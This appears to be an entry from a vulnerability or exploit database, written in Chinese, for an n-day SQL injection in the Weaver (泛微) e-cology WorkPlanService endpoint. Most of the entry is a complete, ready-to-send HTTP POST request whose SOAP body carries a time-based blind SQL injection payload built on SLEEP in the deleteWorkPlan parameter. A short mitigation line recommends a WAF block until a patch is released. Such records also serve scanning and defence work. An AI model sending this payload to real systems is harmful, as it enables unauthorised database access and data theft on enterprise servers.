vendor = "泛微"
name = "泛微e-cology workplanservice SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/services/WorkPlanService"
detail = "POST /services/WorkPlanService HTTP/1.1 HOST: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36 Content-Type: text/xml;charset=UTF-8 Connection: close <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:web=\"webservices.workplan.weaver.com.cn\"> <soapenv:Header/> <soapenv:Body> <web:deleteWorkPlan> <!--type: string--> <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0> <!--type: int--> <web:in1>22</web:in1> </web:deleteWorkPlan> </soapenv:Body> </soapenv:Envelope>"
fix = "WAF封禁路路径，等待发布补丁"
date = "0815"
label = "nday"
